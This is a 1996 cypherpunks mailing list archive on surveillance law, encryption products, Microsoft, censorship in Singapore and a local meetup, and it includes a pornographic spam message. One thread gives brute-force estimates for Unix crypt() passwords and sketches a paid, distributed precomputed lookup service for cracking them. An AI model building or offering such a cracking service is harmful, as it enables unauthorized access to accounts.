are not killed. It is NOT to give the police a means to gather operating
funds. If the police were honest in this pursuit they would sit on the side
of the road radaring to their hearts content as long as their lights were on
indicating they were actively on duty while everyone else zoomed along
listening to their detectors buzz. Yes, we would have much less money from
tickets but we would have many more living people paying taxes as well. I
also suspect that if this were implimented it would take many fewer police
to regulate traffic further reducing the needs for money. The law was
specificaly and openly put in place because the radar detector decreased the
chances of the police from catching and ticketing you, somewhat different
than enforcing public safety.

The police in a democratic society should never be allowed to skulk around
monitoring the populace.

Cops hiding in the bushes and other such tactics are not law enforcement but
rather state sanctioned theft. Gives 'highwayman' a whole new slant.

The argument that by allowing such activity the police are prohibited from
catching criminals ignores the fact that the police are firstly enforced
with public safety. Their primary job is to PREVENT the incident within
their operating parameters and only secondarily to apprehend participants
after the fact.

Again, a strawman the courts and lots of others have swallowed.

> >I< tend to agree with you, but I see the arguments on the other side as
> well.

I also see the other side, I believe the Constitutional approach that I
advocate can meet and defeat any argument they may present PROVIDED the
court does not have a alterior motive of sustaining the status quo but
rather an open goal of enforcing the Constitution for life, liberty, and the
pursuit of happiness.

I believe that is a rare find indeed. Don't get me wrong. I estimate the
chance of my success to win support, let alone actualy getting any of it
implimented, as pretty close to nil. But if I don't discuss it on public
forums such as this then who else will?

> > If the police don't need a warrant to
> > collect information then citizens are equaly able to recieve that
> > information as well.
> 
> How EXACTLY does this follow?

Because courts, not police are empowered to search. Constitutionaly a police
officer may detain you (by local law) but he may NOT search you until presented
to a magistrate. This is what was meant by 'fair and speedy trial'. 

> > Since the above ruling states that as long as the
> > emissions are eminating from the site and the reception takes place
> > other than at the site (in this case, being inside the police car)
> > , perhaps along a public highway, then no privacy is involved. This
> > means that citizens have a right, by extension, to know when they are
> > being beamed by radar.
> 
> Again, you need to distinguish law enforcement purposes and private
> purposes.

Constitutionaly there is no distinction. Police are citizens also.

> > This same chain of logic can be extended to cell phones and such as
> > well.
> 
> And yet you need a warrant to intercept cell phone conversation.

Exactly, and by extension you should need a warrant to monitor ANY other
form of EM radiation when acting as a officer of the court collecting
information or evidence relating to possible or existing proceedings.

> > This connection is even clearer when one realizes that the only difference
> > between IR and your cell phone eminations is frequency. The intermediate
> > vector boson in both cases is a photon.
> 
> And the fact that cellphones carry voice communications.

Is irrelevant. You can't know that fact without first measuring the medium.
Sorta defeats the whole purpose. You have to measure it to determine if you
can measure it, stupid or premeditated misrepresentation.

> > It is similar to arresting somebody for wearing a blue shirt but letting
> > the person wearing the red shirt go free.
> 
> ANd having the blue shirt say "kill the president" maybe would even out
> your example.

How? It certainly raises the spectre of 'strawman'. Attempting to change the
subject to 'freedom of speech' is not a respectable tactic. What is on the
shirt is irrelevant.

> > The rationale being that since
> > the frequency of the blue shirt is higher it is fundamentaly different
> > then the red shirt.
> 
> No, the rational being that the blue shirt carries a communication more
> complicated than a simple speed reading, or heat emmission.

But how do you determine that without first measuring it? I don't think that
'probable cause' or 'oath or affirmation' were meant to include 'gut
feeling'.
 
                                                  Jim Choate





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bart  Croughs <bart.croughs@tip.nl>
Date: Sat, 17 Aug 1996 08:04:46 +0800
To: "'cypherpunks@toad.com>
Subject: Re: National Socio-Economic Security Need for Encryption Technology
Message-ID: <01BB8BC5.691DCF00@groningen08.pop.tip.nl>
MIME-Version: 1.0
Content-Type: text/plain


Sandy Sandfort wrote:

>On a personal note:  Bart the people on this list are highly
intelligent <snip>  Don't waste your reputation capital being a
jerk.


 S a n d y<

I agree that there are intelligent people on this list, but those who constantly have to take refuge in name-calling are obviously not among them. So I have an even better idea to protect my reputation capital: I won't answer your posts any longer. People could start thinking I have nothing better to do with my time.


Bart Croughs












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bart  Croughs <bart.croughs@tip.nl>
Date: Sat, 17 Aug 1996 08:03:09 +0800
To: "'cypherpunks@toad.com>
Subject: Re: Imprisoned Capital
Message-ID: <01BB8BC5.8380DFE0@groningen08.pop.tip.nl>
MIME-Version: 1.0
Content-Type: text/plain



Duncan Frissell wrote:

>There is no straightforward link between amount of capital invested and
>productivity or wages.  If there were, some steel plants in the Soviet Union
>would have had the best paid and most productive workers on earth.

It's not a coincidence that you mention the Soviet Union. As I said in a previous post, Austrian economists like Murray Rothbard, Hans Hermann Hoppe, etc. don't consider government expenditures to be *investments* of capital; they consider all government expenditures to be *consumption*. 

>Additionally, countries which prevent capital outflows don't receive capital
>inflows and thus become poorer.

>DCF

This is a good point when you talk about governments that will prevent *all* capital from flowing out. But a government could prevent the outflow of capital of it's own citizens, and still allow capital of foreigners to leave the country. As long as foreign capital isn't imprisoned, foreign capital could be attracted.

Bart Croughs







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hallam-Baker <hallam@ai.mit.edu>
Date: Sat, 17 Aug 1996 13:40:14 +0800
To: cypherpunks@toad.com
Subject: Re: Lunch with Bill, anyone?
In-Reply-To: <4v23s1$574@life.ai.mit.edu>
Message-ID: <32153700.41C6@ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


John C. Randolph wrote:

> Does Microsquish *know* any industry luminaries?  I mean, Cutler
> used to be one, but he's pretty burnt out, if Windoze NT is any
> indication.

Butler Lampson and Rashid are both pretty hot. Cutler got NT
to a workable state considerably faster than he got VMS to
one. 

There are many computer companies that are full of Bozos,
Microsoft isn't one of them. Most of the people griping about
Microsoft can't code any better. 

I'm interested that Navigator 3b6 crashes several times daily 
while Internet Explorer has yet to crash on me. I couldn't
care less about fancy features, at this stage I want a browser
that is reliable - like they used to be.

		Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: brendon@home.net (Brendon Macaraeg)
Date: Sat, 17 Aug 1996 16:10:37 +0800
To: cypherpunks@toad.com
Subject: proxy servers in Singapore
Message-ID: <1.5.4.32.19960817031055.006c95e4@poptart.home.net>
MIME-Version: 1.0
Content-Type: text/plain


Did anyone else catch the AP wire story
(it ran here in the SF Chronicle on Thursday)
about the Singapore government cracking
down on "undesirable" (e.g., sex smut, anti-govt.
postings etc.) content on web sites, usenet etc.
Their basically forcing, by law, Singapore  ISPs to use
proxy servers that contain the information
that the govt. deems fit. 

Scary if you ask me. But then they have a govt.
that acts like it's the management of Disneyland.

"Have a nice ride!"
-B
=====================================================
Brendon Macaraeg
http://www.itp.tsoa.nyu.edu/~brendonm 
Finger macaragb@acf2.nyu.edu for my PGP Public Key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 17 Aug 1996 16:20:21 +0800
To: Eric Blossom <cypherpunks@toad.com
Subject: Re: Triple DES Encryption Now Available For Telephone Privacy Protection
Message-ID: <199608170629.XAA16771@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:04 PM 8/16/96 -0700, Eric Blossom wrote:
>Communication Security Corporation 
>
>For More Information: Eric Blossom (707) 577-0409
>Press Contact:  Terri Thatcher (408) 265-7703
>Triple DES Encryption Now Available For Telephone Privacy Protection 
>Santa Rosa, Calif., August 16, 1996, -- The Communication Security
>Corporation today announced availability of the CS8191. The first
>telephone security device built using uncompromised cryptography,
>based on 168--bit key triple DES.
>  
>Triple DES encryption technology provides an uncompromised level of
>security (72 quadrillion times stronger against a brute force attack)
>than products based on the US Data Encryption Standard (single DES).
>In addition, unlike the government's "Clipper" proposal, the CS8191
>does not reveal or "escrow" the encryption keys with third parties.

So does this use that previously-announced NTT encryption chip?

> 
>The CS8191 has been designed to work with conventional analog
>telephone systems (POTS).  The unit connects between your telephone
>and the wall. In 'clear' mode, your telephone continues to work as it
>normally does. Pressing the 'go secure' button encrypts
>conversations. Communication Security has also incorporated a
>leading-edge speech coder.  Voice clarity is undisturbed whether the
>system is in 'secure' or 'clear' mode. 

Is this some sort of standardized interface?  Or are we in for the crypto 
equivalent of the Tower of Babel?

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Anonymous MacDonald <remailer@cypherpunks.ca>
Date: Sat, 17 Aug 1996 17:04:12 +0800
To: cypherpunks@toad.com
Subject: Re: $10K offer if you can break the code
Message-ID: <199608170652.XAA06550@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


Hello!

On 16 Aug 96 at 18:04, Mike wrote:

> Don't cash the check yet.  It's security by obscurity using the
> highest quality "unpublished algorithms" and up to a 48 byte
> key phrase.  

In Hong Kong, the Chinaman has the perfect way to describe
a situation like this. He will say, "Hey friend, a roach this 
big won't simply jump in the streets for you to catch."
 
> He's only willing to send out the free version by return snail 
> mail - no Net access...Snip..snip....  

The guys behind PGPn123 tried the same snail mail stuff 
recently. The response was so bad they gave up after a while.

Anyway, let's see what will happen in this case, but it's 
truly pathetic and ironic to think of snail mail in this 
cyberonic age.

Later...

Roach










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: webmaster@www.whore.com
Date: Sat, 17 Aug 1996 14:10:07 +0800
To: cypherpunks@toad.com
Subject: Greetings from Whore.com
Message-ID: <1371882871-6745844@caroline.com>
MIME-Version: 1.0
Content-Type: text/plain


Greetings!
This is an automated response from http://www.whore.com andÊhttp://www.slut.com.
You indicated you wanted to receive email from one of our sluts.
If this is NOT true, please reply to this email and type 'cancel slut #8927'
in the body of the message.
I hope you DO want to receive email, because 
Asia just turned 21 and wants to meet you.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: William Ono <wmono@Direct.CA>
Date: Sat, 17 Aug 1996 19:23:57 +0800
To: "Carlos L. Mariscal" <al177820@campus.gda.itesm.mx>
Subject: Re: Unix passwd-cracker online?
In-Reply-To: <Pine.A32.3.91.960816161112.53362A-100000@campus.gda.itesm.mx>
Message-ID: <Pine.LNX.3.94.960817000216.1458B-100000@crash.direct.ca>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 16 Aug 1996, Carlos L. Mariscal may have written:

> person has obtained a specific password by entering the desired 
> adresses'passord on a submnit form in a Web page.
[deletia]
> never have it if there really is such, but this came to my mind when i read 
> the posts  on the plate-numbers-in-Oregon polemica. I would appreciate 

Somehow I have a hard time believing this to be true.  I run crack, a
password searching program that uses a dictionary as its base, on my
/etc/passwd regularly to locate any users with easily guessed entries.
With ultra fast crypt (UFC), the fastest crypt() replacement I can find, I
can run through about 9700 passwords per second on this P6-150.

Now, this is a back-of-the-envelope calculation:  Assuming that the
password can be one to eight characters of the following:
abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890!@#$%^&*()
we find that we have a set of 72 characters.  That gives us
72^8 + 72^7 + 72^6 + 72^5 + 72^4 + 72^3 + 72^2 + 72^1 or
732376025552520 possible combinations.  At 9700 encryptions per second,
it would take my system 2401 years to brute force -one- password to 
completion.  That means that, most likely, if this 'locate password on
demand' system existed, it would not work in real time, or in any time
during any person's life.  Moore's Law might shorten this timeframe
considerably, but still not to any reasonable time frame.

Continuing with my back-of-the-envelope estimate, we have the length of a
crypt()'d password as being 13 characters.  The password in plaintext has
to follow, with a length of 8 characters.  At a size of 
732376025552520 * 21 characters, we would have a database of
15379896536602920 bytes, or 22565249 650mb CD-ROMs.  That's for the
passwords of one salt, without any formatting.  Even if we could achieve a
95% compression rate on this data (it is text, after all) we would end up
with 237528 CD-ROMs.

Most likely my set of characters will be found to be incorrect, but
anything that includes even a-z, A-Z, and 0-9 in one to eight character
combinations most likely will not be a favourable crack target.

Sorry, I don't think this is feasable, or possible.

(Please do correct my calculations if errors are detected, especially if
the corrected numbers make this possible.. it's getting late at night, and
my mind is fogging up, so these calculations/estimates/wild guesses may be
off more than usual. It does sound like an interesting project to
undertake, if it were possible, but not on my equipment!)


--    ** NOTE NEW KEY **  As of 08/28/95!  Old key 0x2902B621 COMPROMISED!
William Ono <wmono@direct.ca>                                PGP Key: F3F716BD
 fingerprint = A8 0D B9 0F 40 A7 D6 64  B3 00 04 74 FD A7 12 C9 = fingerprint
PGP-encrypted mail welcome!           "640k ought to be enough for everybody."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joey Grasty" <jgrasty@gate.net>
Date: Sat, 17 Aug 1996 15:40:11 +0800
To: cypherpunks@toad.com
Subject: South Florida Cypherpunks Meeting Reminder
Message-ID: <199608170542.BAA46994@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


Y'all:

The South Florida Cypherpunks will meet at Hops Grill & Bar
in Boynton Beach, FL on Saturday, August 17 at 2:00 PM.  As
always, our meeting place is at a microbrewery, and this one
has some very fine brews.

Jim Ray will show off his Snake Oil bottle, signed by Phil
Zimmermann, who wrote PGP.  I will also hand out copies of my
WinSock Remailer to anyone who wants to check it out.  Other than 
that, we have no agenda, other than discussing cypherpunkology 
and drinking some fine brews.

Directions:

Take I-95 to Boynton Beach Blvd and go west.  When you get
to Congress Ave., turn right (north) and go one stoplight 
until you get to Old Boynton Beach Blvd.  Turn left (west)
and go behind Longhorn Steakhouse and turn right into
the parking lot behind Longhorn Steakhouse.  Hops is just
north of Longhorn on Congress Ave.

  Hops Grill & Bar
  545 N. Congress Ave.
  Boynton Beach, FL.

In addition, the Cypherpunks Brewmaster, Jim Ray, is brewing 
up a special "cypherpunks summer dark" brew for the meeting.  (I
sampled some of the brew before bottling, and BBBUUURP! it was
good.)  We will enjoy his fine beer at my house following the 
meeting.  I'll pass out maps to my house in Deerfield Beach
for anyone who wants to go.

Please send me a note if you plan to attend so that I can alert
the restaurant on how many will attend.  Send me your
key and fingerprint for keysigning if it hasn't been signed by any
cypherpunks before.

Regards,

--
Joey Grasty
jgrasty@gate.net [home -- encryption, privacy, RKBA and other hopeless causes]
jgrasty@pts.mot.com [work -- designing pagers]
"Anyone who considers arithmetical methods of producing random digits is,
of course, in a state of sin." -- John Von Neumann
PGP = A7 CC 31 E4 7E A3 36 13  93 F4 C9 06 89 51 F5 A7




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vipul Ved Prakash <vipul@pobox.com>
Date: Sat, 17 Aug 1996 07:03:08 +0800
To: jya@pipeline.com (John Young)
Subject: Re: FCC_ups
In-Reply-To: <199608112108.VAA23815@pipe1.ny3.usa.pipeline.com>
Message-ID: <199608170231.CAA00337@fountainhead.net>
MIME-Version: 1.0
Content-Type: text


> 
>    8-10-96. WaPo: 
>  
>    "Phone Service Via the Internet May Slash Rates." 
>  
>       Labs of Advanced Technology has developed a way for 
>       people to make long-distance calls over the Internet 
>       using only their telephones, at about half the price of 
>       ordinary toll calls. Customers would merely call a 
>       central number, then dial their long-distance numbers. 
>       The call is carried on the Internet, then put back onto 
>       the local phone system at its destination. The company 
>       plans to charge 5 to 8 cents per minute for all domestic 
>       U.S. calls, which represents a 50 to 75 percent discount 
>       off most domestic long-distance rates. International 
>       rates would depend on arrangements made with foreign 
>       phone companies. "Twenty years from now, and probably 
>       sooner, I don't see the giants of the telecommunications 
>       industry existing anymore," said the company's 
>       president. The giants hoot, "FCC, PACs, whack him." 
>  

This kind of report is often confusing and more often misleading.
Most of the internet still runs on "the infrastructure provided by 
the giants of the telecommunications industry, who according to the report 
would cease to exist after some time". 

Bigbells and Babybells provide cheap [flat rate local calls] and 
expensive long-distance calls. They make most of their money on the
later. This money goes into development and maintainance of their
infrastructure. Once they loose these profits 1. They won't be able
to provide cheap local-calls and/or 2. They would go bankrupt and shut the
entire network which is used by many to connect to the internet.

This is complex problem and the only solution I see to it is a
different pricing policy. [Prolly a differential pricing system might fit
the scenario but I don't have much idea about that] 

First flat rates would have to go out.
If Alice uses her phone for 5 hrs in month and pay _x_ dollars and Bob uses
his for 100 hrs and pays _x_ dollars, then Alice is subsidising Bob, which
is not really ethical. Everyone should pay for the amount of bandwith 
one is using.  

Another criteria for pricing can be content. Which would also imply that
a guy sitting in Delhi, India (like me) pays more for reaching a Server based 
in US, as compared to a local server. 

--- Vipul

  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Daniel Miskell <DMiskell@envirolink.org>
Date: Sat, 17 Aug 1996 17:32:10 +0800
To: cypherpunks@toad.com
Subject: Re: Greetings from Whore.com
Message-ID: <199608170706.DAA04875@envirolink.org>
MIME-Version: 1.0
Content-Type: text/plain


Someone please tell me that was a joke.  It's almost a temptation.

(falls down laughing and dies)

Greetings from <property not found>,
Daniel.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blane@aa.net (Brian C. Lane)
Date: Sat, 17 Aug 1996 14:50:54 +0800
To: mpd@netcom.com (Mike Duvos)
Subject: Re: $10K offer if you can break the code
In-Reply-To: <199608170104.SAA14968@netcom13.netcom.com>
Message-ID: <32154c32.5692262@mail.aa.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 16 Aug 1996 18:04:33 -0700 (PDT), you wrote:

>> MMMmmmm.... Money!
>
>Don't cash the check yet.  It's security by obscurity using the
>highest quality "unpublished algorithms" and up to a 48 byte
>key phrase.  
>
>He's only willing to send out the free version by return snail 
>mail - no Net access.  Any crack you submit must also decrypt
>other messages they will feed it, must be completely documented,
>and any prize awards are at their sole descretion. 
>
>He's also selling the high performance "9600 Baud" version for
>$100.  

  Looks like a crock to me. He gives no email address to contact him with,
no business name, and it sounds like an extremely user un-friendly program.
People are definatly better off using PGP.

  I'd bet that his unpublished algorithm is an XOR with the key, and that
it could be broken pretty easily. I'd also be that there is no $10,000
reward.

  People like this guy give cryptography a bad name. They target people who
don't know much and are susceptible to his claims and who would be better
off using PGP or ViaCrypt.

  What can we do to dispute his claims? Has anyone gotten a copy of his
sample message yet?

   Brian

------- <blane@aa.net> -------------------- <http://www.aa.net/~blane> -------
       "Extremism in the defense of Liberty is no vice" - B. Goldwater
==============  11 99 3D DB 63 4D 0B 22  15 DC 5A 12 71 DE EE 36  ============




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blane@aa.net (Brian C. Lane)
Date: Sat, 17 Aug 1996 15:20:34 +0800
To: cypherpunks@toad.com
Subject: Orbiting Datahavens
Message-ID: <32155657.53661@mail.aa.net>
MIME-Version: 1.0
Content-Type: text/plain



  With all the recent talk about converted oil-rig DataHavens floating
around the oceans, fending off pirates, and Low-Orbit satellite
communications, I had a thought.

  How about an orbiting DataHaven. No jurisdiction to bother with,
extremely difficult to get to (except by large governments...). You could
put together a couple of Linux boxes with a RAID system, some backups and a
large solar panel and have a very nice, secure DataHaven.

  Granted, you wouldn't have all the fun of floating around the south
pacific fending off pirates and navies who are after your data, but it
would work. Might even be cheaper than outfitting the oil-ring with the
rate that they are tossing satellites into space.

  If the HAM radio community can get a satellite into space, why not the
Cypherpunks/Linux communities?

   Brian

------- <blane@aa.net> -------------------- <http://www.aa.net/~blane> -------
       "Extremism in the defense of Liberty is no vice" - B. Goldwater
==============  11 99 3D DB 63 4D 0B 22  15 DC 5A 12 71 DE EE 36  ============




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David.K.Merriman@toad.com,       "webmaster@www.shellback.com" <merriman@amaonline.com>
Date: Sun, 18 Aug 1996 00:11:39 +0800
To: cypherpunks@toad.com
Subject: IE3.0 128-bit
Message-ID: <199608171359.GAA00854@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: cypherpunks@toad.com
Date: Sat Aug 17 08:59:05 1996
Just got off of MS IE3 download page. To retrieve the 128-bit version, 
they've got a perl script asking for a remote address and a host address 
via a pair of cookies. Unfortunately, it chokes *every single time* it's 
invoked on my system, and shows me a 1-800 number (terminally busy) to 
call.

Has anyone either managed to download it, or gotten through to the 1-800 
number? I'd _really_ like a copy of the 128-bit version. I'm a U.S. 
citizen, live here in Amarillo, TX.

Anyone from MicroSloth reading this *might* want to let a Responsible 
Person know about the perl script hiccups....

Dave Merriman, Densa's mole in Mensa

- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
PGP Email welcome, encouraged, and PREFERRED. Visit my web
site at         http://www.shellback.com/p/merriman
for my PGP key and fingerprint
"What is the sound of one hand clapping in a forest
with no one there to hear it?"
I use Pronto Secure (tm) PGP-fluent Email software for Windows
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMhUZZcVrTvyYOzAZAQHqygQAiEe7RmKjZcZ44Ok7Gz6GI1CCebBcdWsc
1lk2AvHJNOsI1ifq+oXbz1IuSbYJFwBOAUgJmwdXh4OMq8TIyX7mJKpR+imlysFC
kk1kMtVsdPNbtaLap5LLOMMnw13NxjC4ysae1rKZ/j/8SLXEvmscoDwzO+wtyOyn
kYgcgh6n8NQ=
=5P41
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Anonymous)
Date: Sat, 17 Aug 1996 15:19:07 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199608170503.HAA09053@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:05 PM 8/16/96 -0400, you wrote:

>There are many computer companies that are full of Bozos,
>Microsoft isn't one of them. Most of the people griping about
>Microsoft can't code any better.

Gee Phill, as I'm preparing to leave MS after 6 years, I have to 
disagree with you.  Mediocrity and bureaucracy have eatten away 
at a lot of the core of the company.  It is entirely marketing driven 
now, and the coders have definitely gone down hill since I first
started in Apps.  The "bozo" factor has steadily increased.  Only 
those new hires without a sense of history think it's a real cool 
place to work.  And, a few egocentric folks totally tripped on 
power and greed.  (Apologies to any MSofties on the list I don't
know personally.)

Talk to HR about the turnover of people with 5.5 to 8 years
under their belts who are bailing with their stock options because
it ain't a fun place to work anymore.  Testers, developers, UE,
you name it.

I can gripe because I was there.  I never seem to recall seeing
your name on any internal e-mail.

Oh yeah, this is coming through a remailer, because I'm reading
the list at work.  And I doubt BillG would appreciate my opinions
being sent out over MS resources.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lou Zirko <lzirko@c2.org>
Date: Sun, 18 Aug 1996 00:45:04 +0800
To: cypherpunks@toad.com
Subject: Re: IE3.0 128-bit
Message-ID: <199608171414.HAA10883@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain

-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: merriman@amaonline.com, cypherpunks@toad.com,
 webmaster@microsoft.com
Date: Sat Aug 17 09:15:34 1996
My results were have been the same using ie30b2, but Netscape would attampt 
to download or ask me what app to run the .pl file with.

Lou Zirko

> To: cypherpunks@toad.com
> Date: Sat Aug 17 08:59:05 1996
> Just got off of MS IE3 download page. To retrieve the 128-bit version,
> they've got a perl script asking for a remote address and a host
>  address
> via a pair of cookies. Unfortunately, it chokes *every single time*
>  it's
> invoked on my system, and shows me a 1-800 number (terminally busy) to
> call.
> 
> Has anyone either managed to download it, or gotten through to the
>  1-800
> number? I'd _really_ like a copy of the 128-bit version. I'm a U.S.
> citizen, live here in Amarillo, TX.
> 
> Anyone from MicroSloth reading this *might* want to let a Responsible
> Person know about the perl script hiccups....
> 
> Dave Merriman, Densa's mole in Mensa
> 
> -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
> PGP Email welcome, encouraged, and PREFERRED. Visit my web
> site at         http://www.shellback.com/p/merriman
> for my PGP key and fingerprint
> "What is the sound of one hand clapping in a forest
> with no one there to hear it?"
> I use Pronto Secure (tm) PGP-fluent Email software for Windows

Lou Zirko                                (502)383-2175
Zystems                                  lzirko@c2.org
"We're all bozos on this bus" - Nick Danger, Third Eye

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: latin1

iQEVAwUBMhXUEctPRTNbb5z9AQHbeQf/ZOFzjDVZzgWKBhKvsVFzbyA3ayNNyJqG
NuSNQ+W1TAiETioARwuCvSaokah7RBmoMOtPetGtUJBDkaw0KsKiGnByP/95a+73
+J49pubnhx7sM0PqiUNcdnE25gyHKwzSC82M31yOmsGst1FfPoklryoCdCUc2AOT
A0HJpjRaIY/CdMx1WtnO8u1Pnl47GyazfkCOqpXnD6fcONvQOawadNJFUL8ehvKF
vrvTn8rwo7W/71ijoFqphBJYIxnZpM34eJRz2mX8KE6VXlXCBWzCeVzoJD4zk5Yo
DYqYmhmhKRubl9I9jbzG2VR6yCAPeYdYrtjWPNWgs56Yd5swlUCKpA==
=WlX/
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Russell/SYBASE <Ryan.Russell@sybase.com>
Date: Sun, 18 Aug 1996 01:22:50 +0800
To: cypherpunks <cypherpunks@sybase.com>
Subject: Re: Unix passwd-cracker online?
Message-ID: <9608171503.AA17207@notesgw2.sybase.com>
MIME-Version: 1.0
Content-Type: text/plain


I've given this some thought before, and there are some optimizations
required...

First of all, assuming you have one plaintext password 
for every crypt()'d combo and salt (I think there are actually
a bunch of possible plaintexts for each encryption, but I'll assume
that we'll save the one that looks most like an english somethingorother
as any of them should work.)

If you just sort them,  you only need to store the 8 char plaintext,
which helps with the storage, and halves it approximatly (a little more,
actually.)  Now...Still too much sotrage for one system, but
if we had a network of machines around the Internet, with multi-gig
tape changers (i've seen 40GB changer things a discount places for $1000)
I figure DNS could server as a way of reaching the system that has the range
you want..say  we have maxhines named xJG*a.crackcrypt.com, with a leading
letter on each hostname, followed by enough characters to represent how
much of a range that system holds.

I don't have a back of the envelop handy, and it's too early in the morning...so
I'll do the calc later.

But, for a small fee, anything can be arranged :)

      Ryan

The real problem becomes regeneration when someone's tape
goes corrupt....
---------- Previous Message ----------
To: al177820
cc: cypherpunks
From: wmono @ Direct.CA (William Ono) @ smtp
Date: 08/17/96 01:27:53 AM
Subject: Re: Unix passwd-cracker online?

On Fri, 16 Aug 1996, Carlos L. Mariscal may have written:

> person has obtained a specific password by entering the desired 
> adresses'passord on a submnit form in a Web page.
[deletia]
> never have it if there really is such, but this came to my mind when i read 
> the posts  on the plate-numbers-in-Oregon polemica. I would appreciate 

Somehow I have a hard time believing this to be true.  I run crack, a
password searching program that uses a dictionary as its base, on my
/etc/passwd regularly to locate any users with easily guessed entries.
With ultra fast crypt (UFC), the fastest crypt() replacement I can find, I
can run through about 9700 passwords per second on this P6-150.

Now, this is a back-of-the-envelope calculation:  Assuming that the
password can be one to eight characters of the following:
abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890!@#$%^&*()
we find that we have a set of 72 characters.  That gives us
72^8 + 72^7 + 72^6 + 72^5 + 72^4 + 72^3 + 72^2 + 72^1 or
732376025552520 possible combinations.  At 9700 encryptions per second,
it would take my system 2401 years to brute force -one- password to 
completion.  That means that, most likely, if this 'locate password on
demand' system existed, it would not work in real time, or in any time
during any person's life.  Moore's Law might shorten this timeframe
considerably, but still not to any reasonable time frame.

Continuing with my back-of-the-envelope estimate, we have the length of a
crypt()'d password as being 13 characters.  The password in plaintext has
to follow, with a length of 8 characters.  At a size of 
732376025552520 * 21 characters, we would have a database of
15379896536602920 bytes, or 22565249 650mb CD-ROMs.  That's for the
passwords of one salt, without any formatting.  Even if we could achieve a
95% compression rate on this data (it is text, after all) we would end up
with 237528 CD-ROMs.

Most likely my set of characters will be found to be incorrect, but
anything that includes even a-z, A-Z, and 0-9 in one to eight character
combinations most likely will not be a favourable crack target.

Sorry, I don't think this is feasable, or possible.

(Please do correct my calculations if errors are detected, especially if
the corrected numbers make this possible.. it's getting late at night, and
my mind is fogging up, so these calculations/estimates/wild guesses may be
off more than usual. It does sound like an interesting project to
undertake, if it were possible, but not on my equipment!)


--    ** NOTE NEW KEY **  As of 08/28/95!  Old key 0x2902B621 COMPROMISED!
William Ono <wmono@direct.ca>                                PGP Key: F3F716BD
 fingerprint = A8 0D B9 0F 40 A7 D6 64  B3 00 04 74 FD A7 12 C9 = fingerprint
PGP-encrypted mail welcome!           "640k ought to be enough for everybody."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul S. Penrod" <furballs@netcom.com>
Date: Sun, 18 Aug 1996 02:03:46 +0800
To: cypherpunks@toad.com
Subject: Re: Lunch with Bill, anyone?
In-Reply-To: <32153700.41C6@ai.mit.edu>
Message-ID: <Pine.3.89.9608170814.A2211-0100000@netcom>
MIME-Version: 1.0
Content-Type: text/plain




On Fri, 16 Aug 1996, the glorious Hallam-Baker prognosticated:

> John C. Randolph wrote:
> 
> > Does Microsquish *know* any industry luminaries?  I mean, Cutler
> > used to be one, but he's pretty burnt out, if Windoze NT is any
> > indication.
> 
> Butler Lampson and Rashid are both pretty hot. Cutler got NT
> to a workable state considerably faster than he got VMS to
> one. 
> 
> There are many computer companies that are full of Bozos,
> Microsoft isn't one of them. Most of the people griping about
> Microsoft can't code any better. 
> 

Depends. If it's media, then you are correct. If it's technical, then 
you're not. The biggest complaints about MS I hear come from people that 
actually know what they are talking about and are damn good at it.

> I'm interested that Navigator 3b6 crashes several times daily 
> while Internet Explorer has yet to crash on me. I couldn't
> care less about fancy features, at this stage I want a browser
> that is reliable - like they used to be.
> 
> 		Phill
> 

This is why it's called a "Beta" Phill...

As for reliable, there is no such thing... there is only MTBF.

...Paul





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Schryvers <schryver@radiks.net>
Date: Sun, 18 Aug 1996 00:56:05 +0800
To: brendon@home.net (Brendon Macaraeg)
Subject: Re: proxy servers in Singapore
Message-ID: <199608171424.JAA26755@sr.radiks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 11:10 PM 8/16/96 -0400, you wrote:
